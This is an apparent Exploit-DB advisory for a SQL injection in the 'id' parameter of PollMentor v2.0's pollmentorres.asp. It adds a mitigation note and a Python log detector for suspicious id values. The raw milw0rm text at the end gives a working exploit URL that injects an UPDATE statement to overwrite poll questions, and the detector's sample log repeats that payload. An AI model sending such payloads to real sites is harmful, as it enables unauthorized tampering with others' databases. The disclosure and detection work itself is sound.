Vendor: PollMentor
By: SaO
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: PollMentor
Affected Version From: PollMentor v2.0
Affected Version To: Unknown
Patch Exists: NO
CPE: a:pollmentor:pollmentor:2.0
Platforms Tested: Unknown
Year: 2007

PollMentor v2.0

The vulnerability allows an attacker to inject SQL commands through the 'id' parameter of the pollmentorres.asp script, which can lead to unauthorized access to, or manipulation of, the poll database.

Mitigation:

The vendor should sanitize user input and use parameterized queries or prepared statements to prevent SQL injection attacks.
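
Because no patch exists, a log check for the request pattern described above is useful. This is an added example, not part of the original advisory: it reads IIS W3C extended log lines and flags any request to pollmentorres.asp whose `id` value is not a plain integer. The log lines are constructed, and the rule that valid poll ids are non-negative integers is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Script and parameter named in the advisory.
TARGET_SCRIPT = "pollmentorres.asp"
TARGET_PARAM = "id"
INTEGER = re.compile(r"[0-9]{1,10}")  # assumption: poll ids are non-negative integers

# Constructed IIS W3C extended log lines (not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-02-13 10:01:02 192.0.2.10 GET /poll/pollmentorres.asp id=12 200
2007-02-13 10:01:09 192.0.2.44 GET /poll/pollmentorres.asp id=-1+UPDATE+poll+SET+question='HekId';-- 200
2007-02-13 10:02:30 192.0.2.10 GET /poll/PollMentorRes.asp ID=7%3B-- 500
2007-02-13 10:03:00 192.0.2.77 GET /poll/pollmentor.asp id=abc 200
2007-02-13 10:03:05 192.0.2.10 GET /poll/pollmentorres.asp - 200
"""


def find_suspicious_requests(log_text):
    """Return (client_ip, decoded_id) for each request to the target script
    whose id parameter is not a plain integer."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # the column layout can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        # IIS paths and ASP parameter names are case-insensitive.
        if row.get("cs-uri-stem", "").rsplit("/", 1)[-1].lower() != TARGET_SCRIPT:
            continue
        for pair in row.get("cs-uri-query", "-").split("&"):
            name, _, value = pair.partition("=")
            if unquote_plus(name).lower() != TARGET_PARAM:
                continue
            decoded = unquote_plus(value)  # undo %XX and '+' encoding before checking
            if not INTEGER.fullmatch(decoded):
                hits.append((row.get("c-ip", "?"), decoded))
    return hits


if __name__ == "__main__":
    for ip, value in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\t{value!r}")
```

The W3C log records only the query string, so an `id` submitted in a POST body would not appear in it.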

Exploit-DB raw data:

XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
X                                       X
X Author  : SaO                         X
X Site    : wWw.SaoHackStyLe.cOm        X
X Contact : By.SaO[at]Hotmail[dot]com   X
X                                       X
X                                       X
XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX

# Script   : PollMentor v2.0
# Download : http://www.aspindir.com/indir.asp?id=4406
# Demo     : http://www.aspcode.net/products/pollmentor/demo/pollmentor.asp
# ßug in   : pollmentorres.asp
# Exp.     : 
http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--

# milw0rm.com [2007-02-13]